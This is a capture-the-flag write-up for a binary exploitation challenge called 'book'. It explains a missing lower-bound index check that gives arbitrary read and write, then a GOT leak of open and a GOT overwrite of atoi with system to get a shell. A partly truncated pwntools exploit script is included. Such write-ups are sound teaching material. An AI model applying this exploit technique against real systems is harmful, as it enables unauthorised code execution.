Tags: pwn 


## Challenge Description

Read books for inspiration so you know what to write!

Flag format: CTF{sha256}

### Intuition

Checksec the binary to see what we have.

$ checksec book
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 74 Symbols No 0 4 book
We have PIE enabled but Partial RELRO. Partial RELRO might mean that we will overwrite GOT entries.

We decompile the binary and find a missing lower bound check for the index of the entry we read/write. We have arbitrary read/write primitives before the address of the todos list. Luckily, the GOT entries are before it. The main idea would be to leak a libc address, find the libc version and overwrite a function with ``system``.

### Solution

We can only leak an arbitrary amount of bytes, until a null byte is found, with the ``printf`` found in ``print_todo``.

void print_todo(void)

int iVar1;

printf("Which entry would you like to read? ");
iVar1 = read_int();
if (iVar1 < 0x81) {
printf("Your NOTE: %s\n",todos + iVar1 * 0x30);
else {
puts("Sorry but this model only supports 128 NOTE list entries.\n");
The catch is, we can only read at offsets of ``0x30`` bytes from the beginning of the ``todos``. Luckily it is perfectly aligned with some GOT functions, but the ``"%s"`` format string will run into some issues if it finds the null byte. We choose to leak open as it is perfectly aligned at an offset of ``-4 * 0x30``. We get the address, determine the libc version manually using [libc database](https://libc.blukat.me/) and then determine the offset to ``system`` from ``open``. Luckily we only need the lower 3 bytes of the address from the leak, so the ``"%s"`` format won’t be too inconvenient.

We can use ``store_todo`` to write, again at offsets of ``0x30`` bytes from ``todos``. Below you can find a commented version of the exploit:

#!/usr/bin/env python3

from pwn import *

target = process("./book")
#target = remote("", 30325)

# Different offsets on local/remote
is_remote = False
if is_remote:
# libc6_2.31-0ubuntu9.9_amd64
system_offset = -0xbba50
system_offset = -801120

# Addresses found in .got.plt and .data
# PIE is enabled but we write relative to todos address and it will be fine
todos_addr = 0x00104140
open_gotplt_addr = 0x00104080

# Function to transform offsets to indices for todos
def get_offset_idx(addr):
return (addr - todos_addr) // 48

# Leak open address using arbitrary read primitive
idx = get_offset_idx(open_gotplt_addr)
target.recvuntil(b"Your NOTE: ")
leak = target.recvline().strip()
print(hex(leak[0]), hex(leak[1]))

# somewhere here we can manually search for the libc version

# Determine system address
open_addr = int.from_bytes(leak, byteorder="little")
system_addr = open_addr + system_offset

# Write relative to todos
idx = get_offset_idx(open_gotplt_addr)

# Overwrite GOT entry of atoi
# atoi is right next to open, which means we use the previous open leak
# to keep open intact
leak = leak + b"\x00" * (8 - len(leak)) if len(leak) < 8 else leak # this is just to make sure the leak has 8 bytes
# then overwrite atoi with system
payload = leak + p64(system_addr)

print(b"sending:" + payload)

# pop a shell ;)

An important thing to add is that we choose ``atoi`` not only because it is easy to overwrite (right next to open), which allows us to keep the rest of the addresses in GOT intact, but also because the next input we give to the program will be directly passed to ``atoi``. Which means that if we replace it with ``system`` we pretty much get a shell.

#### Flag


Original writeup (https://dothidden.xyz/defcamp_quals_2023/book/).